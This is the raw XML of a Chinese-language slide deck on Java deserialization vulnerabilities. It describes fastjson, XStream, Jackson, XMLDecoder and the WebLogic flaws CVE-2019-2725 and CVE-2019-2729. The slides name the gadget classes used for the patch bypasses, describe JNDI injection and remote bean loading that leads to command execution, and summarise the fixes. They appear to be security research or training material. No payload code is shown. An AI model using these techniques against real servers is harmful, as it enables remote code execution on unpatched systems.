          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4247964" y="2133922"/>
              <a:ext cx="647740" cy="64744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25400" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="BFBFBF"/>
              </a:solidFill>
              <a:round/>
            </a:ln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265">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill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5" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013286" y="2501078"/>
              <a:ext cx="145055" cy="2659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endPara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46" name="组合 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4338667" y="4738249"/>
            <a:ext cx="6374183" cy="954106"/>
            <a:chOff x="4247964" y="2098395"/>
            <a:chExt cx="5005170" cy="749433"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5081388" y="2098395"/>
              <a:ext cx="4171746" cy="7494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en-US" altLang="zh-CN" sz="2800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fastjson</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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800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XStream</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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800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jackson</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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endPara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  <a:p>
              <a:pPr defTabSz="913765">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1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XMLDecoder</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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组件历史漏洞总结</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="圆角矩形​​ 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4247964" y="2133922"/>
              <a:ext cx="647740" cy="647441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 w="25400" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="BFBFBF"/>
              </a:solidFill>
              <a:round/>
            </a:ln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265">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill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49" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013286" y="2501078"/>
              <a:ext cx="145055" cy="2659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endPara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9" name="组合 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CB8410-301A-4C0D-AE04-77E69BEB9A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4359321" y="5879898"/>
            <a:ext cx="3048821" cy="824262"/>
            <a:chOff x="4247964" y="2133922"/>
            <a:chExt cx="2394012" cy="647441"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="TextBox 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26B1A585-F841-40F8-8FAA-2438CEE79BD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004131" y="2279892"/>
              <a:ext cx="1637845" cy="4109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r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="280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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="280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总结</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="28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微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>与思考</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="圆角矩形​​ 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFE7418D-306F-4B11-8163-3035178B9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7964" y="2133922"/>
              <a:ext cx="647740" cy="647441"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="25400" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="BFBFBF"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="91376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4265" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ECA2119-E98C-4DA7-B16F-B1B772307327}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013286" y="2501078"/>
              <a:ext cx="145055" cy="26592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913765">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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7" grpId="0"/>
      <p:bldP spid="41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CVE-2019-2725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0C7C2A2-87DF-4AD1-AB9B-84235504D47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295373" y="1182677"/>
            <a:ext cx="1149755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根据以上补丁，我们可以通过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class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标签实例化任意对象，调用类的构造函数来实现绕过，构造函数的参数通过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byte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/String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标签传入。类的构造函数有这么几种情况是可以利用的： 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defTabSz="913765">
              <a:buAutoNum type="arabicPeriod"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构造函数有写文件操作，文件名和内容可控，可以进行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getshell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（没找到）。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构造函数有其他的反序列化操作，我们可以进行二次反序列化操作。 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构造函数直接有执行命令的操作，执行命令可控（没找到）。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4.  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有其它的可能导致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rce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的操作，比如表达式注入之类的（没找到）。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170814" y="2952475"/>
            <a:ext cx="10943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913765">
              <a:buAutoNum type="arabicPeriod"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oracle.toplink.internal.sessions.UnitOfWorkChangeSet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服务器版本：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10.3.6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环境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7u21)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D7A826-CAAC-4940-8291-F82CA46F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610" y="3321807"/>
            <a:ext cx="82010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23334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CVE-2019-2725</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="913765">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1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漏洞触发点：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66C61F9-5BD2-46C2-843E-29EE0919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743" y="1736741"/>
            <a:ext cx="777240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84875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CVE-2019-2725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170815" y="1218915"/>
            <a:ext cx="117446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2. com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager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实现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jndi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注入（服务器版本：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10.3.6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jdk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小于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1.8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D64E6A8-D6A8-483B-9384-2207B02E3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0" y="1844480"/>
            <a:ext cx="8172450" cy="132397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9EF272D-FD2A-4815-BB00-A5BBF6C8F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13" y="3197784"/>
            <a:ext cx="8220075" cy="15430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BA3A900-534B-4C90-8AE4-BF17A2DC12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17" y="4770163"/>
            <a:ext cx="8239125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81572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CVE-2019-2725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170815" y="1218915"/>
            <a:ext cx="11744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en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>EventData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>12.1.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）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6E9669-6B7A-4C1B-A528-09D6F4183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617" y="1609013"/>
            <a:ext cx="8210550" cy="28956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490CAE-3CF7-4E89-8C50-BFB63D62E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617" y="4839970"/>
            <a:ext cx="7715250" cy="18669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F21D753-00CC-4A17-894F-755E5AAAF6F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293421" y="4470638"/>
            <a:ext cx="6415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POC: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41777233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CVE-2019-2725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170815" y="1218915"/>
            <a:ext cx="117446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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>property</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;void property=""&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（服务器版本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>12.1.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>jdk1.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以上）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0F45543-882F-4CE3-8726-268F62D8E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669" y="1696480"/>
            <a:ext cx="81534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124871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CVE-2019-2725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170815" y="1218915"/>
            <a:ext cx="96990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/>
              <a:t>FileSystemXmlApplicationContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CVE-2017-17485</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>） 利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>FileSystemXmlApplicationContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加载远程 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bean </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定义文件，创建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ProcessBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件中使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Spring EL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>start() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法实现命令执行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1F0D52-B66E-45C8-B27D-7DAD0067B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823" y="2252515"/>
            <a:ext cx="824865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221322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CVE-2019-2725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170815" y="1218915"/>
            <a:ext cx="96990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补丁信息：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤了，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性值有限制：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6C6263B-F0AA-46BC-82BF-62E493856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38" y="1588247"/>
            <a:ext cx="7567662" cy="504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75197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CVE-2019-2729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170815" y="1218915"/>
            <a:ext cx="113298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dirty="0"/>
              <a:t>容错特性导致漏洞产生：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;array method="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>forName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Class.forName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>classname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反射方法获取类代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签，但是处理环境有限制：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>weblogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10.3.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>jdk:1.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以下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829F92-3C9B-4CFC-9CB0-D0C5555B9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330" y="1844480"/>
            <a:ext cx="7456433" cy="494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232920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CVE-2019-2729</a:t>
            </a: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63946C-7E8D-45A8-961C-EA1992AE2F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597214" y="1704244"/>
            <a:ext cx="27683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dirty="0"/>
              <a:t>补丁信息：使用白名单，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性不限制。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5384678-F67C-453B-9D0A-935A2D65F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578" y="151130"/>
            <a:ext cx="5098382" cy="650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0656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/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Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PART 03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4026707" y="3777733"/>
            <a:ext cx="6937973" cy="50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zh-CN" altLang="en-US" sz="2665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总结与思考</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2665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/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/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325798699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反序列化介绍及漏洞触发场景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317CA8-2397-4FA3-9BA1-103AA6F2B7B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663018" y="705227"/>
            <a:ext cx="11101634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方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>序列化：把对象的状态信息转换为字节序列过程，方便网络传输和存储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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反序列化：序列化逆过程由字节流还原成对象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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反序列化漏洞本质：当服务端允许接收远端数据进行反序列化时，客户端可以提供任意一个服务端存在的目标类的对象 （包括依赖包中的类的对象） 的序列化二进制串，由服务端反序列化成相应对象。如果该对象是由攻击者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>精心构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的恶意对象，而它自定义的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readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中存在着一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>不安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的逻辑，那么在对它反序列化时就有可能出现安全问题。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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞触发场景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1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>
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>被广泛使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>RMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>协议完全基于序列化 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2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>
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请求中的参数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Parameters </a:t>
            </a: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3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>
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JMX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>同样用于处理序列化对象 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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、自定义协议 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>- (T3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,JRMP,JMS,AMF,JSF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="方正兰亭准黑_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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91677" y="468318"/>
            <a:ext cx="2721206" cy="646332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总结与思考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99070" y="1198149"/>
            <a:ext cx="116012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zh-CN" altLang="en-US" dirty="0"/>
            </a:b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9002929-349D-4AC2-8712-9B6D81E1C88F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1388879" y="1142929"/>
            <a:ext cx="947079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765">
              <a:defRPr/>
            </a:pP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对于组件安全问题漏洞挖掘</a:t>
            </a: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、寻找第三方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jar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包（存在命令执行、远程调用的）</a:t>
            </a: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、挖掘新的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gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="913765">
              <a:defRPr/>
            </a:pP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对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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weblogic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服务器漏洞挖掘</a:t>
            </a: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、白盒审计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800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readObject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入口点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继续挖掘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T3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协议的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  <a:p>
            <a:pPr defTabSz="913765">
              <a:defRPr/>
            </a:pP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、现在挖掘方向大多是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T3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协议的反序列化，针对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JMX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JMS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AFM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JSF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EJB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等协议或者架构方向还是空白。</a:t>
            </a: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、挖掘新的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gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="913765">
              <a:defRPr/>
            </a:pP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1884109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6655442"/>
            <a:ext cx="12192000" cy="202557"/>
            <a:chOff x="0" y="1371600"/>
            <a:chExt cx="12192000" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr>
